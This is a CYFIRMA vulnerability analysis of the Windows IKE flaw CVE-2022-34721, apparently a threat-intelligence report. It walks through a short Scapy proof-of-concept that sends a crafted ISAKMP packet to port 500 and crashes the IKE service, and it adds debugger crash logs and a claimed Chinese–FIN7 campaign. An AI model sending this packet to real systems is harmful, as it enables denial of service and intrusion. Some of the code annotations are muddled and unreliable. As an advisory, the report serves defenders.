Windows Internet Key

Exchange (IKE) Remote

Code Execution
Vulnerability Analysis
(CVE-2022-34721)

1 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

EXECUTIVE SUMMARY
CYFIRMA research team observed a series of exploits active in the wild targeting
Windows Internet Key Exchange (IKE) Protocol Extensions. We believe with moderate
confidence that this vulnerability is being utilized by the threat actors to target almost
1000+ systems that are still vulnerable.

CYFIRMA has observed hacker’s footprint related to this vulnerability as part of a

campaign “流血你” translating to “bleed you”, suspected to be operated by unknown
mandarin speaking threat actors (Confidence: Moderate) – details of which are also
presented in this report.

From underground forums, the CYFIRMA Research team also observed unknown
hackers sharing the exploit link which could be used to target vulnerable systems.

INTRODUCTION
A critical vulnerability has been identified in Microsoft Windows Internet Key Exchange
(IKE) Protocol Extensions. This vulnerability (CVE-2022-34721) affects unknown code of
the IKE Protocol Extensions component, manipulation of which leads to remote code
execution (RCE). Its vectors are summarized as follows:
• Attack Vector (AV) is Network
• Confidentiality (C) is High
• Integrity (I) is High
• Availability (A) is High

KEY TAKEAWAYS

• The vulnerability lies in the code used to handle IKEv1 (Internet Key
Exchange) protocol, which is deprecated but compatible with legacy
systems.

• The POC exploits a memory corruption issue with the svchost of the
vulnerable system. Memory corruption occurs when Page
Heap (a debugging plug-in) in the system is enabled for the Internet Key
Exchange process. The exe process hosting the Internet Key
Exchangeprotocol service crashes while attempting to read
data beyond an allocated buffer.

• Microsoft has mapped this issue to CVE-2022-34721 and fixed it by

adding a check on the length of incoming data and skipping
processing of that data if the length is too small.

2 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

VULNERABILITY AT A GLANCE
Windows Internet Key Exchange (IKE) Remote Code Execution

CVE-2022-34721

CVSS Score: 9.8

CYFIRMA Risk Rating: Critical

Exploit Detail: Link

Description
The vulnerability is caused by a flaw in the Internet Key Exchange (IKE) Protocol
Extensions component. An attacker could exploit this vulnerability to execute
arbitrary code on the system, by sending a specially crafted IP packet to a
Windows node where IPSec is enabled.

The vulnerability only impacts IKEv1 and IKEv2 is not impacted. However, all
Windows Servers are affected because they accept both V1 and V2 packets
thereby making the flaw critical.

AFFECTED VERSIONS

The affected versions are listed as follows:

Name Vendor Start Version End Version
Windows_server_2008 Microsoft r2 r2
Windows_server_2012 Microsoft r2 r2
Windows_10 Microsoft 1607 1607
Windows_8.1 Microsoft - -
Windows_server_2016 Microsoft - -
Windows_server_2008 Microsoft - -
Windows_7 Microsoft - -
Windows_rt_8.1 Microsoft - -
Windows_server_2012 Microsoft - -
Windows_10 Microsoft - -
Windows_10 Microsoft 20h2 20h2
Windows_10 Microsoft 21h1 21h1

3 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

Windows_10 Microsoft 21h2 21h2

Windows_10 Microsoft 1809 1809
Windows_11 Microsoft - -
Windows_11 Microsoft - -
Windows_server_2019 Microsoft - -
Windows_server_2022 Microsoft - -
Windows_server_2022 Microsoft - -
Source: Microsoft

EXPLOIT ANALYSIS
CYFIRMA Research team carried out an exploit analysis of this vulnerability.
Details are as below:

from scapy.all import *

from scapy.contrib.ikev2 import *

from scapy.layers.isakmp import *

• Scapy is a powerful Python-based interactive packet manipulation program and

library.

import socket, time

• Sockets and the socket API are used to send messages across a network. They
provide a form of inter-process communication (IPC).
• Time for maintaining the time Python has a module named time to handle time-
related tasks.

target = ("target IP address", 500)

• IP and PORT for Target vulnerable systems.

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

• AF_INET is an address family that is used to designate the type of addresses that your
socket can communicate with (in this case, Internet Protocol v4 addresses).
• SOCK_DGRAM. Provides datagrams, which are connectionless messages of a fixed
maximum length.

4 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)

• The ISAKMP protocol is a framework for dynamically establishing security associations

and cryptographic keys in an Internet environment.
• 0xf3: ó
• 0x84: „
• RandString(8) : Random String of size eight

pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")

• ISAKMP_payload is used to prepare the payload

• Here “b” payload is 001127
• next payload is 1

sock.sendto(raw(pkt), target)

• raw(pkt) assemble the packet

• target is the vulnerable IP target.

PROOF OF CONCEPT
The following sections showcase the POC details.

Fig: Victim’s IP address

5 CYFIRMA 2022, All rights are reserved

Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

Fig: Packet Sent from Attacker’s Machine

Fig: Event Logged into the logs from svchost.exe

6 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

Fig: IKE and AuthIP IPsec Keying Modules were stopped

Source: ACROS Security

CRASH LOGS
Following are the log details of the memory corruption in svchost caused by the POC.

7 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

C++

(128.414): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ikeext!IkeQueueRecvRequest+0x158:
00007ffb`9e48d138 0f1000 movups xmm0,xmmword ptr [rax]
ds:0000017a`08459000=????????????????????????????????

0:005> r
rax=0000017a08459000 rbx=0000000000000000 rcx=00000008905fef70
rdx=ffffffffffffc000 rsi=00000008905feff0 rdi=0000017a08456f10
rip=00007ffb9e48d138 rsp=00000008905fef30 rbp=00000008905fefa0
r8=0000000000000000 r9=0000000000000000 r10=0000017a08459000
r11=0000017a08459000 r12=0000000000000000 r13=0000017a0843cb80
r14=0000017a08456f20 r15=0000000000000001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
ikeext!IkeQueueRecvRequest+0x158:
00007ffb`9e48d138 0f1000 movups xmm0,xmmword ptr [rax]
ds:0000017a`08459000=????????????????????????????????

0:005> !heap -p -a @rax

address 0000017a08459000 found in
_DPH_HEAP_ROOT @ 17a08281000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize -
VirtAddr VirtSize)
17a08285a28: 17a08459000 0 - 17a08458000 2000
ReadMemory error for address 0000017a08459000
00007ffbc8177e7f ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007ffbc811e1fa ntdll!RtlpAllocateHeap+0x000000000009c70a
00007ffbc807fcad ntdll!RtlpAllocateHeapInternal+0x000000000000098d
00007ffb9e486910 ikeext!WfpMemAlloc+0x0000000000000020
00007ffb9e48d0ce ikeext!IkeQueueRecvRequest+0x00000000000000ee
00007ffb9e4f1c0d ikeext!IkeReinjectReassembledPacket+0x0000000000000181
00007ffb9e4f17ed ikeext!IkeInsertFragEntry+0x0000000000000259
00007ffb9e4f1865 ikeext!IkePostPayloadProcessFrag+0x0000000000000031
00007ffb9e4f1564 ikeext!IkeHandlePayloadFrag+0x00000000000000ac
00007ffb9e507652 ikeext!IkeHandleMMPacketDispatchAuthip+0x000000000000005e
00007ffb9e4ead86 ikeext!IkeProcessPacket+0x00000000000002f2
00007ffb9e47fc84 ikeext!IkeProcessPacketDispatch+0x0000000000000fd4
00007ffb9e47bb9c ikeext!IkeHandleRecvRequest+0x000000000000000c
00007ffbc809e7e9 ntdll!TppSimplepExecuteCallback+0x0000000000000099
00007ffbc8086964 ntdll!TppWorkerThread+0x0000000000000644
00007ffbc7cc7974 KERNEL32!BaseThreadInitThunk+0x0000000000000014
00007ffbc80ca2f1 ntdll!RtlUserThreadStart+0x0000000000000021

0:005> dq @rax
0000017a`08459000 ????????`???????? ????????`????????
0000017a`08459010 ????????`???????? ????????`????????
0000017a`08459020 ????????`???????? ????????`????????
0000017a`08459030 ????????`???????? ????????`????????
0000017a`08459040 ????????`???????? ????????`????????
0000017a`08459050 ????????`???????? ????????`????????
0000017a`08459060 ????????`???????? ????????`????????
0000017a`08459070 ????????`???????? ????????`????????

0:005> k

8 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

# Child-SP RetAddr Call Site

00 00000008`905fef30 00007ffb`9e4f1c0d
01 00000008`905fefd0 00007ffb`9e4f17ed
ikeext!IkeReinjectReassembledPacket+0x181
02 00000008`905ff110 00007ffb`9e4f1865
03 00000008`905ff180 00007ffb`9e4f1564
04 00000008`905ff1c0 00007ffb`9e507652
05 00000008`905ff200 00007ffb`9e4ead86
ikeext!IkeHandleMMPacketDispatchAuthip+0x5e
06 00000008`905ff230 00007ffb`9e47fc84
07 00000008`905ff2f0 00007ffb`9e47bb9c
08 00000008`905ff850 00007ffb`c809e7e9
09 00000008`905ff880 00007ffb`c8086964
0a 00000008`905ff8d0 00007ffb`c7cc7974
0b 00000008`905ffbc0 00007ffb`c80ca2f1
0c 00000008`905ffbf0 00000000`00000000
Source: 78ReserchLab
ikeext!IkeQueueRecvRequest+0x158
ikeext!IkeInsertFragEntry+0x259
ikeext!IkePostPayloadProcessFrag+0x31
ikeext!IkeHandlePayloadFrag+0xac
ikeext!IkeProcessPacket+0x2f2
ikeext!IkeProcessPacketDispatch+0xfd4
ikeext!IkeHandleRecvRequest+0xc
ntdll!TppSimplepExecuteCallback+0x99
ntdll!TppWorkerThread+0x644
KERNEL32!BaseThreadInitThunk+0x14
ntdll!RtlUserThreadStart+0x21

UNDERGROUND AND DARK WEB FORUMS

From underground forums, CYFIRMA Research team observed unknown
hackers sharing the exploit link which could be used to exploit vulnerable
systems.

Source: Underground Forums

9 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

EXTERNAL THREAT LANDSCAPE MANAGEMENT

AND CAMPAIGN
Through CYFIRMA tracked campaigns, we have observed Unknown Chinese
threat actors in collaboration with Russian Cybercriminals – FIN7 with
Confidence Level: Moderate, potentially looking to exploit the weakness in
the systems to carry out their nefarious activities.

Unknown Chinese Threat Actors

Russian Cybercriminals – FIN7

Campaign Details
CYFIRMA research observed campaign “ 流血你” translating to “bleed you”
suspected to be launched on 6 September 2022 targeting weak/vulnerable
Windows OS, Windows Servers, Windows protocols, and services. The Unknown
Chinese Threat Actors identified these systems are running weak/vulnerable,
which could be exploited using existing exploits.

As part of the campaign, we also noticed Chinese threat actors potentially

colluding with Russian cybercriminals. From a strategic viewpoint on changing
geopolitical scenarios from external threat landscape management, Russia
and China are observed to form a strategic relationship.

Target Industries

Multiline Retail Industrial Diversified Financial IT Services,

Conglomerates, Services E-Commerce
Government

Target Geographies

10 CYFIRMA 2022, All rights are reserved

 Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

USA UK Australia Canada France Germany Turkey

Japan India UAE Israel

Motivation
Exfiltration of sensitive information for financial gains, and gaining elevated
access, cause operational disruption.

TTPs
Exploiting a weakness in the systems, Potential malware & ransomware attacks,
and Lateral movement into the organization.

CONCLUSION
Analysis done by CYFIRMA research on Windows Internet Key Exchange (IKE)
Protocol Extensions Remote Code Execution vulnerability provides a
detailed understanding of what POC attackers could utilize to exploit this
vulnerability. Readers should also take note of the ETLM campaign details
uncovered and being tracked by CYFIRMA.

CYFIRMA advises customers to patch the vulnerability as per the Microsoft

advisory as soon as possible.

CYFIRMA is an external threat landscape management platform company. We combine

cyber intelligence with attack surface discovery and digital risk protection to deliver the
early warning, personalized, contextual, outside-in, and multi-layered insights. Our cloud-
based AI and ML-powered analytics platform provide the hacker’s view with deep insights
into the external cyber landscape, helping clients prepare for impending attacks. CYFIRMA
is headquartered in Singapore with offices across APAC, US, and EMEA. The company is
funded by Goldman Sachs, Zodius Capital, and Z3 Partners.

11 CYFIRMA 2022, All rights are reserved